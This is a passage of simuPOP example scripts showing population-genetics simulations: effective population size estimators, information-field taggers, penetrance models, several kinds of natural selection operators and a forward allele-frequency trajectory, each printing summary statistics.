'[subPop[(0,1)][\"Ne_demo\"][x] for x in (0, 1, 2)])')\n ],\n gen = 5\n)\n#end_file\n\n\n#begin_file log/statNeTemporal.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([2000], loci=[1]*50)\npop.setVirtualSplitter(sim.RangeSplitter([0, 500]))\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.3, 0.7]),\n sim.Stat(effectiveSize=range(50), subPops=[(0,0)],\n vars='Ne_temporal_base'),\n ],\n preOps=[\n sim.Stat(effectiveSize=range(50), subPops=[(0,0)],\n vars=['Ne_waples89_P1', 'Ne_tempoFS_P1'], step=20),\n sim.PyEval(r'\"Waples Ne: %.1f (%.1f - %.1f), TempoFS: '\n r'%.1f (%.1f - %.1f), at generation %d\\n\" % '\n 'tuple(Ne_waples89_P1 + Ne_tempoFS_P1 + [gen])', step=20)\n ],\n matingScheme=sim.RandomMating(),\n gen = 101\n)\n#end_file\n\n#begin_file log/statNeInterval.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([2000], loci=[1]*50)\npop.setVirtualSplitter(sim.RangeSplitter([0, 500]))\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.3, 0.7]),\n sim.Stat(effectiveSize=range(50), subPops=[(0,0)],\n vars='Ne_temporal_base'),\n ],\n preOps=[\n sim.Stat(effectiveSize=range(50), subPops=[(0,0)], \n vars='Ne_waples89_P1', step=20),\n sim.Stat(effectiveSize=range(50), subPops=[(0,0)], step=20,\n suffix='_i', vars=['Ne_temporal_base', 'Ne_waples89_P1']),\n sim.PyEval(r'\"Waples Ne (till %d): %.1f (%.1f - %.1f), '\n r'(interval) %.1f (%.1f - %.1f)\\n\" % '\n 'tuple([gen] + Ne_waples89_P1 + Ne_waples89_P1_i)',\n step=20)\n ],\n matingScheme=sim.RandomMating(),\n gen = 101\n)\n#end_file\n\n\n#begin_file log/statNeLD.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([2000], loci=[1]*50)\npop.setVirtualSplitter(sim.RangeSplitter([0, 500]))\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.005]*4 + [0.015]*2 + [0.25, 0.7]),\n ],\n preOps=[\n sim.Stat(effectiveSize=sim.ALL_AVAIL, subPops=[(0,0)], \n vars='Ne_LD', step=20),\n sim.PyEval(r'\"LD Ne (gen %d): %.1f (%.1f - %.1f)'\n r', %.1f (%.1f - %.1f, adjusted)\\n\" % '\n 'tuple([gen] + Ne_LD[0.] 
+ Ne_LD[0.02])',\n step=20)\n ],\n matingScheme=sim.RandomMating(),\n gen = 101\n)\n#end_file\n\n\n#begin_file log/statChromTypes.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(1000, loci=[5]*4,\n chromTypes=[sim.AUTOSOME, sim.CHROMOSOME_X, sim.CHROMOSOME_Y, sim.MITOCHONDRIAL])\npop.setVirtualSplitter(sim.SexSplitter())\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(haplotypes=[ [0, 1, 2, 0, 1]*4, [2, 1, 0, 2, 3]*4 ],\n prop=[0.4, 0.6]),\n ],\n matingScheme=sim.RandomMating(\n ops=[\n sim.MendelianGenoTransmitter(),\n sim.MitochondrialGenoTransmitter()]),\n preOps=[\n sim.Stat(neutrality=range(5)),\n sim.Stat(neutrality=range(5, 10), suffix='_X'),\n sim.Stat(neutrality=range(10, 15), suffix='_Y'),\n sim.Stat(neutrality=range(15, 20), suffix='_mt'),\n sim.PyEval(r'\"%.3f %.3f %.3f %.3f\\n\" % (Pi, Pi_X, Pi_Y, Pi_mt)'),\n ],\n gen = 2\n)\n#end_file\n\n\n\n#begin_file log/InheritTagger.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[1000]*10, loci=1, infoFields='x')\n# tag the first individual of each subpopulation.\nfor sp in range(pop.numSubPop()):\n pop.individual(0, sp).x = 1\n\npop.evolve(\n initOps=sim.InitSex(),\n matingScheme=sim.RandomMating(ops=[\n sim.MendelianGenoTransmitter(),\n sim.InheritTagger(mode=sim.MAXIMUM, infoFields='x'),\n ]),\n postOps=[\n sim.Stat(sumOfInfo='x', vars=['sumOfInfo_sp']),\n sim.PyEval(r'\", \".join([\"%3d\" % subPop[i][\"sumOfInfo\"][\"x\"] for i in range(10)])+\"\\n\"'),\n ],\n gen = 5\n)\n#end_file\n\n#begin_file log/SummaryTagger.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\nsim.IdTagger().reset(1)\n#end_ignore\npop = sim.Population(1000, loci=1, infoFields=['fitness', 'avgFitness'])\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5]),\n ],\n preOps=sim.MaSelector(loci=0, wildtype=0, fitness=[1, 0.99, 0.95]),\n matingScheme=sim.RandomMating(ops=[\n sim.MendelianGenoTransmitter(),\n sim.SummaryTagger(mode=sim.MEAN, infoFields=['fitness', 'avgFitness']),\n ]),\n postOps=[\n sim.Stat(alleleFreq=0, meanOfInfo='avgFitness', step=10),\n sim.PyEval(r\"'gen %d: allele freq: %.3f, average fitness of parents: %.3f\\n' % \"\n \"(gen, alleleFreq[0][1], meanOfInfo['avgFitness'])\", step=10)\n ],\n gen = 50,\n)\n#end_file\n\n\n#begin_file log/OffspringTagger.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\nsim.IdTagger().reset(1)\n#end_ignore\npop = sim.Population(1000, loci=1, infoFields='offspring_idx')\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5]),\n ],\n matingScheme=sim.RandomMating(ops=[\n sim.MendelianGenoTransmitter(),\n # lethal recessive alleles\n sim.MaSelector(loci=0, wildtype=0, fitness=[1, 0.90, 0.5]),\n sim.OffspringTagger(),\n sim.DiscardIf('offspring_idx > 4'),\n ], numOffspring=10),\n postOps=[\n sim.Stat(alleleFreq=0, step=10),\n sim.PyEval(r\"'gen %d: allele freq: %.3f\\n' % \"\n \"(gen, alleleFreq[0][1])\", step=10)\n ],\n gen = 50,\n)\n#end_file\n\n#begin_file log/IdTagger.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as 
sim\n#begin_ignore\nsim.setRNG(seed=12345)\nsim.IdTagger().reset(1)\n#end_ignore\npop = sim.Population(10, infoFields='ind_id', ancGen=1)\npop.evolve(\n initOps=sim.IdTagger(),\n matingScheme=sim.RandomSelection(ops=[\n sim.CloneGenoTransmitter(),\n sim.IdTagger(),\n ]),\n gen = 1\n)\nprint([int(ind.ind_id) for ind in pop.individuals()])\npop.useAncestralGen(1)\nprint([int(ind.ind_id) for ind in pop.individuals()])\nsim.tagID(pop) # re-assign ID\nprint([int(ind.ind_id) for ind in pop.individuals()])\n#end_file\n\n#begin_file log/PedigreeTagger.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\nsim.IdTagger().reset(1)\n#end_ignore\npop = sim.Population(100, infoFields=['ind_id', 'father_id', 'mother_id'])\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.IdTagger(),\n sim.PedigreeTagger(output='>>pedigree.txt'),\n ],\n matingScheme=sim.RandomMating(ops=[\n sim.IdTagger(),\n sim.PedigreeTagger(output='>>pedigree.txt'),\n sim.MendelianGenoTransmitter()]\n ),\n gen = 100\n)\nped = open('pedigree.txt')\nlines = ped.readlines()\nped.close()\n# first few lines, saved by the first PedigreeTagger\nprint(''.join(lines[:3]))\n# last several lines, saved by the second PedigreeTagger\nprint(''.join(lines[-3:]))\n# load this file\nped = sim.loadPedigree('pedigree.txt')\n# should have 100 ancestral generations (plus one present generation)\nped.ancestralGens()\n#begin_ignore\nimport os\nos.remove('pedigree.txt')\n#end_ignore\n#end_file\n\n#begin_file log/PyTagger.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\ndef randomMove(x, y):\n '''Pass parental information fields to offspring'''\n # shift right with high concentration of alleles... 
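(note: in this version the\n # offspring is simply placed at the midpoint of its parents plus\n # Gaussian noise with sd 0.1; position does not depend on genotype)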
\n off_x = random.normalvariate((x[0]+x[1])/2., 0.1)\n off_y = random.normalvariate((y[0]+y[1])/2., 0.1)\n return off_x, off_y\n\npop = sim.Population(1000, loci=[1], infoFields=['x', 'y'])\npop.setVirtualSplitter(sim.GenotypeSplitter(loci=0, alleles=[[0, 0], [0,1], [1, 1]]))\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5]),\n sim.InitInfo(random.random, infoFields=['x', 'y'])\n ],\n matingScheme=sim.RandomMating(ops=[\n sim.MendelianGenoTransmitter(),\n sim.PyTagger(func=randomMove),\n ]),\n postOps=[\n sim.Stat(minOfInfo='x', maxOfInfo='x'),\n sim.PyEval(r"'Range of x: %.2f, %.2f\\n' % (minOfInfo['x'], maxOfInfo['x'])")\n ],\n gen = 5\n)\n\n#end_file\n\n#begin_file log/otherTagging.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(1000, loci=[1], infoFields=['aff', 'numOfAff'])\n# define virtual subpopulations by affection status\npop.setVirtualSplitter(sim.AffectionSplitter())\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5]),\n ],\n preOps=[\n # get affection status for parents\n sim.MaPenetrance(loci=0, wildtype=0, penetrance=[0.1, 0.2, 0.4]),\n # set 'aff' of parents\n sim.InfoExec('aff = ind.affected()', exposeInd='ind'),\n ],\n # get number of affected parents for each offspring and store in numOfAff\n matingScheme=sim.RandomMating(ops=[\n sim.MendelianGenoTransmitter(),\n sim.SummaryTagger(mode=sim.SUMMATION, infoFields=['aff', 'numOfAff'])]),\n postOps=[\n # get affection status for offspring\n sim.MaPenetrance(loci=0, wildtype=0, penetrance=[0.1, 0.2, 0.4]),\n # calculate mean 'numOfAff' of offspring, for unaffected and affected subpopulations.\n sim.Stat(meanOfInfo='numOfAff', subPops=[(0,0), (0,1)], vars=['meanOfInfo_sp']),\n # print mean number of affected parents for unaffected and affected offspring.\n sim.PyEval(r"'Mean number of affected parents: %.2f (unaff), %.2f (aff)\\n' % "\n "(subPop[(0,0)]['meanOfInfo']['numOfAff'], subPop[(0,1)]['meanOfInfo']['numOfAff'])")\n ],\n gen = 5\n)\n\n#end_file\n\n\n\n#begin_file log/MapPenetrance.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=2000, loci=2)\nsim.initGenotype(pop, freq=[.2, .8])\nsim.mapPenetrance(pop, loci=0,\n penetrance={(0,0):0, (0,1):.2, (1,1):.3})\nsim.stat(pop, genoFreq=0, numOfAffected=1, vars='genoNum')\n# number of affected individuals\npop.dvars().numOfAffected\n# which should be roughly (#01 + #10) * 0.2 + #11 * 0.3\n(pop.dvars().genoNum[0][(0,1)] + pop.dvars().genoNum[0][(1,0)]) * 0.2 \\\n+ pop.dvars().genoNum[0][(1,1)] * 0.3\n#end_file\n\n#begin_file log/MaPenetrance.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(5000, loci=3)\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.9] + [0.02]*5)\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.MaPenetrance(loci=0, penetrance=(0.01, 0.2, 0.3)),\n sim.Stat(numOfAffected=True, vars='propOfAffected'),\n sim.PyEval(r"'Gen: %d Prevalence: %.1f%%\\n' % (gen, propOfAffected*100)"),\n ],\n gen = 5\n)\n#end_file\n\n#begin_file log/MlPenetrance.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as 
sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(5000, loci=3)\nsim.initGenotype(pop, freq=[0.2]*5)\n# a multi-locus penetrance model\nsim.mlPenetrance(pop, mode=sim.MULTIPLICATIVE,\n ops = [sim.MaPenetrance(loci=loc,\n penetrance=[0, 0.3, 0.6]) for loc in range(3)])\n# count the number of affected individuals.\nsim.stat(pop, numOfAffected=True)\npop.dvars().numOfAffected\n#end_file\n\n#begin_file log/PyPenetrance.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\npop = sim.Population(size=2000, loci=[1]*2, infoFields=['p', 'smoking'])\npop.setVirtualSplitter(sim.InfoSplitter(field='smoking', values=[0,1]))\n# a penetrance function that depends on genotype at two loci and on the\n# 'smoking' information field\ndef penet(geno, smoking):\n # BB Bb bb\n # AA 0.01 0.01 0.01\n # Aa 0.01 0.03 0.03\n # aa 0.01 0.03 0.05\n #\n # geno is (A1 A2 B1 B2)\n if geno[0] + geno[1] == 1 and geno[2] + geno[3] != 0:\n v = 0.03 # case of Aa with Bb or bb\n elif geno[0] + geno[1] == 2 and geno[2] + geno[3] == 1:\n v = 0.03 # case of aaBb\n elif geno[0] + geno[1] == 2 and geno[2] + geno[3] == 2:\n v = 0.05 # case of aabb\n else: \n v = 0.01 # other cases\n if smoking:\n return v * 2\n else:\n return v\n\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[.5, .5]),\n sim.PyOutput('Calculate prevalence in smoker and non-smokers\\n'),\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n # set smoking status randomly\n sim.InitInfo(lambda : random.randint(0,1), infoFields='smoking'),\n # assign affection status\n sim.PyPenetrance(loci=[0, 1], func=penet),\n sim.Stat(numOfAffected=True, subPops=[(0, sim.ALL_AVAIL)], \n vars='propOfAffected_sp', step=20),\n sim.PyEval(r"'Non-smoker: %.2f%%\\tSmoker: %.2f%%\\n' % "\n "(subPop[(0,0)]['propOfAffected']*100, subPop[(0,1)]['propOfAffected']*100)",\n step=20)\n ],\n gen = 50\n)\n\n#end_file\n\n\n\n#begin_file log/PyQuanTrait.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\npop = sim.Population(size=5000, loci=2, infoFields=['qtrait1', 'qtrait2', 'age'])\npop.setVirtualSplitter(sim.InfoSplitter(field='age', cutoff=[40]))\ndef qtrait(geno, age):\n 'Return two traits that depend on genotype and age'\n return random.normalvariate(age * sum(geno), 10), random.randint(0, 10*sum(geno))\n\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.2, 0.8]),\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n # use random age for simplicity\n sim.InitInfo(lambda:random.randint(20, 75), infoFields='age'),\n sim.PyQuanTrait(loci=(0,1), func=qtrait, infoFields=['qtrait1', 'qtrait2']),\n sim.Stat(meanOfInfo=['qtrait1'], subPops=[(0, sim.ALL_AVAIL)],\n vars='meanOfInfo_sp'),\n sim.PyEval(r"'Mean of trait1: %.3f (age < 40), %.3f (age >=40)\\n' % "\n "(subPop[(0,0)]['meanOfInfo']['qtrait1'], subPop[(0,1)]['meanOfInfo']['qtrait1'])"),\n ],\n gen = 5\n)\n\n#end_file\n\n#begin_file log/selectParents.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(4000, loci=1, infoFields='fitness')\nsimu = sim.Simulator(pop, rep=3)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5])\n ],\n preOps=sim.MapSelector(loci=0, fitness={(0,0):1, (0,1):0.98, (1,1):0.97}),\n matingScheme=sim.RandomMating(),\n 
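# selection here acts on parents: the MapSelector in preOps fills the\n # 'fitness' information field, which biases each individual's chance\n # of being chosen as a parent during random mating\n 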
postOps=[\n sim.Stat(alleleFreq=0, step=10),\n sim.PyEval(\"'Gen:%3d ' % gen\", reps=0, step=10),\n sim.PyEval(r\"'%.3f\\t' % alleleFreq[0][1]\", step=10),\n sim.PyOutput('\\n', reps=-1, step=10)\n ],\n gen = 50\n)\n#end_file\n\n#begin_file log/selectOffspring.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(10000, loci=1)\nsimu = sim.Simulator(pop, rep=3)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5])\n ],\n matingScheme=sim.RandomMating(ops=[\n sim.MendelianGenoTransmitter(),\n sim.MapSelector(loci=0, fitness={(0,0):1, (0,1):0.98, (1,1):0.97}),\n ]),\n postOps=[\n sim.Stat(alleleFreq=0, step=10),\n sim.PyEval(\"'Gen:%3d ' % gen\", reps=0, step=10),\n sim.PyEval(r\"'%.3f\\t' % alleleFreq[0][1]\", step=10),\n sim.PyOutput('\\n', reps=-1, step=10)\n ],\n gen = 50\n)\n#end_file\n\n#begin_file log/MapSelector.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=1000, loci=1, infoFields='fitness')\ns1 = .1\ns2 = .2\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[.2, .8])\n ],\n preOps=sim.MapSelector(loci=0, fitness={(0,0):1-s1, (0,1):1, (1,1):1-s2}),\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=0),\n sim.PyEval(r\"'%.4f\\n' % alleleFreq[0][0]\", step=100)\n ],\n gen=301\n)\n\n#end_file\n\n\n#begin_file log/MaSelector.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=1000, loci=1, infoFields='fitness')\ns1 = .1\ns2 = .2\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[.2] * 5)\n ],\n preOps=sim.MaSelector(loci=0, fitness=[1-s1, 1, 1-s2]),\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=0),\n sim.PyEval(r\"'%.4f\\n' % alleleFreq[0][0]\", step=100)\n ],\n gen = 301)\n#end_file\n\n#begin_file log/MaSelectorHaploid.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=10000, ploidy=1, loci=[1,1], infoFields='fitness')\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[.5, .5])\n ],\n # fitness values for AB, Ab, aB and ab\n preOps=sim.MaSelector(loci=[0,1], fitness=[1, 1, 1, 0.95]),\n matingScheme=sim.RandomSelection(),\n postOps=[\n sim.Stat(haploFreq=[0, 1], step=25),\n sim.PyEval(r\"'%.3f\\t%.3f\\t%.3f\\t%.3f\\n' % (haploFreq[(0,1)][(0,0)],\"\n \"haploFreq[(0,1)][(0,1)], haploFreq[(0,1)][(1,0)],\"\n \"haploFreq[(0,1)][(1,1)])\", step=25)\n ],\n gen = 100\n)\n#end_file\n\n#begin_file log/MlSelector.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=10000, loci=2, infoFields='fitness')\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[.5, .5])\n ],\n preOps=[\n sim.MlSelector([\n sim.MapSelector(loci=0, fitness={(0,0):1, (0,1):1, (1,1):.8}),\n sim.MapSelector(loci=1, fitness={(0,0):1, (0,1):0.9, (1,1):.8}),\n ], mode = sim.ADDITIVE, reps=0),\n sim.MapSelector(loci=0, fitness={(0,0):1, (0,1):1, (1,1):.8}, reps=1),\n sim.MapSelector(loci=1, fitness={(0,0):1, (0,1):0.9, (1,1):.8}, reps=2)\n ],\n 
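# replicate 0 combines the two single-locus models additively via\n # MlSelector, while replicates 1 and 2 apply each single-locus\n # selector alone, so the allele frequency trajectories of the combined\n # and separate models can be compared\n 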
matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=[0,1]),\n sim.PyEval(r\"'REP %d:\\t%.3f\\t%.3f\\t' % (rep, alleleFreq[0][1], alleleFreq[1][1])\"),\n sim.PyOutput('\\n', reps=-1),\n ],\n gen = 5\n)\n#end_file\n\n#begin_file log/PySelector.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\nimport random\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=2000, loci=[1]*2, infoFields=['fitness', 'smoking'])\ns1 = .02\ns2 = .03\n# the second parameter gen can be used for varying selection pressure\ndef sel(geno, smoking):\n # BB Bb bb\n # AA 1 1 1\n # Aa 1 1-s1 1-s2\n # aa 1 1 1-s2\n #\n # geno is (A1 A2 B1 B2)\n if geno[0] + geno[1] == 1 and geno[2] + geno[3] == 1:\n v = 1 - s1 # case of AaBb\n elif geno[2] + geno[3] == 2:\n v = 1 - s2 # case of ??bb\n else: \n v = 1 # other cases\n if smoking:\n return v * 0.9\n else:\n return v\n\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[.5, .5])\n ],\n preOps=sim.PySelector(loci=[0, 1], func=sel),\n matingScheme=sim.RandomMating(),\n postOps=[\n # set smoking status randomly\n sim.InitInfo(lambda : random.randint(0,1), infoFields='smoking'),\n sim.Stat(alleleFreq=[0, 1], step=20),\n sim.PyEval(r\"'%.4f\\t%.4f\\n' % (alleleFreq[0][1], alleleFreq[1][1])\", step=20)\n ],\n gen = 50\n)\n#end_file\n\n\n#begin_file log/PyMlSelector.py\nimport simuOpt\nsimuOpt.setOptions(quiet=True, alleleType='mutant')\nimport simuPOP as sim\nimport random\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=2000, loci=[10000], infoFields=['fitness'])\n\nclass GammaDistributedFitness:\n def __init__(self, alpha, beta):\n self.coefMap = {}\n self.alpha = alpha\n self.beta = beta\n \n def __call__(self, loc, alleles):\n # because s is assigned for each locus, we need to make sure the\n # same s is used for fitness of genotypes 01 (1-s) and 11 (1-2s)\n # at each locus\n if loc in self.coefMap:\n s = self.coefMap[loc]\n else:\n s = random.gammavariate(self.alpha, self.beta)\n self.coefMap[loc] = s\n #\n if 0 in alleles:\n return 1. - s\n else:\n return 1. 
- 2.*s\n\npop.evolve(\n initOps=sim.InitSex(),\n preOps=[\n sim.AcgtMutator(rate=[0.00001], model='JC69'),\n sim.PyMlSelector(GammaDistributedFitness(0.23, 0.185),\n output='>>sel.txt'),\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(numOfSegSites=sim.ALL_AVAIL, step=50),\n sim.PyEval(r\"'Gen: %2d #seg sites: %d\\n' % (gen, numOfSegSites)\",\n step=50)\n ],\n gen = 201\n)\nprint(''.join(open('sel.txt').readlines()[:5]))\n#end_file\n\n\n\n#begin_file log/peneSelector.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=2000, loci=1, infoFields='fitness')\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[.5, .5])\n ],\n preOps=[\n sim.MaPenetrance(loci=0, penetrance=[0.01, 0.1, 0.2]),\n sim.Stat(numOfAffected=True, step=25, vars='propOfAffected'),\n sim.PyEval(r\"'Percent of affected: %.3f\\t' % propOfAffected\", step=50),\n sim.InfoExec('fitness = not ind.affected()', exposeInd='ind')\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=0),\n sim.PyEval(r\"'%.4f\\n' % alleleFreq[0][1]\", step=50)\n ],\n gen=151\n)\n#end_file\n\n\n#begin_file log/freqDependentSelector.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=2000, loci=1, infoFields='fitness')\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[.5, .5])\n ],\n preOps=[\n sim.Stat(alleleFreq=0),\n sim.InfoExec('''fitness = {\n 0: 1,\n 1: 1 - (alleleFreq[0][1] - 0.5)*0.1, \n 2: 1 - (alleleFreq[0][1] - 0.5)*0.2}[ind.allele(0,0)+ind.allele(0,1)]''',\n exposeInd='ind'),\n sim.Stat(meanOfInfo='fitness'),\n sim.PyEval(r\"'alleleFreq=%.3f, mean fitness=%.5f\\n' % (alleleFreq[0][1], meanOfInfo['fitness'])\",\n step=25),\n ],\n matingScheme=sim.RandomMating(),\n gen=151\n)\n#end_file\n\n\n#begin_file log/vspSelector.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[5000, 5000], loci=1, infoFields='fitness')\npop.setVirtualSplitter(sim.SexSplitter())\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[.5, .5])\n ],\n preOps=[\n sim.MaSelector(loci=0, fitness=[1, 1, 0.98], subPops=[(0,0), (1,1)]),\n sim.MaSelector(loci=0, fitness=[1, 0.99, 0.98], subPops=[(0,1), (1,0)]),\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=[0], subPops=[(sim.ALL_AVAIL, sim.ALL_AVAIL)],\n vars='alleleFreq_sp', step=50),\n sim.PyEval(r\"'%.4f\\t%.4f\\t%.4f\\t%.4f\\n' % \"\n \"tuple([subPop[x]['alleleFreq'][0][1] for x in ((0,0),(0,1),(1,0),(1,1))])\",\n step=50)\n ],\n gen=151\n)\n#end_file\n\n\n#begin_file log/vspDuringMatingSelector.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[5000, 5000], loci=1, infoFields='fitness')\npop.setVirtualSplitter(sim.SexSplitter())\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[.5, .5])\n ],\n matingScheme=sim.RandomMating(ops=[\n sim.MendelianGenoTransmitter(),\n sim.MaSelector(loci=0, fitness=[1, 1, 0.98], subPops=[(0,0), (1,1)]),\n sim.MaSelector(loci=0, fitness=[1, 0.99, 0.98], subPops=[(0,1), (1,0)]),\n ]),\n postOps=[\n sim.Stat(alleleFreq=[0], subPops=[(sim.ALL_AVAIL, 
sim.ALL_AVAIL)],\n vars='alleleFreq_sp', step=50),\n sim.PyEval(r"'%.4f\\t%.4f\\t%.4f\\t%.4f\\n' % "\n "tuple([subPop[x]['alleleFreq'][0][1] for x in ((0,0),(0,1),(1,0),(1,1))])",\n step=50)\n ],\n gen=151\n)\n#end_file\n\n#begin_file log/forwardTrajectory.py\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom simuPOP.utils import Trajectory, simulateForwardTrajectory\n\ntraj = simulateForwardTrajectory(N=[2000, 4000], fitness=[1, 0.99, 0.98],\n beginGen=0, endGen=100, beginFreq=[0.2, 0.3],\n endFreq=[[0.1, 0.11], [0.2, 0.21]])\n# \n#traj.plot('log/forwardTrajectory.png', set_ylim_top=0.5,\n# plot_c_sp=['r', 'b'], set_title_label='Simulated Trajectory (forward-time)')\npop = sim.Population(size=[2000, 4000], loci=10, infoFields='fitness')\npop.evolve(\n 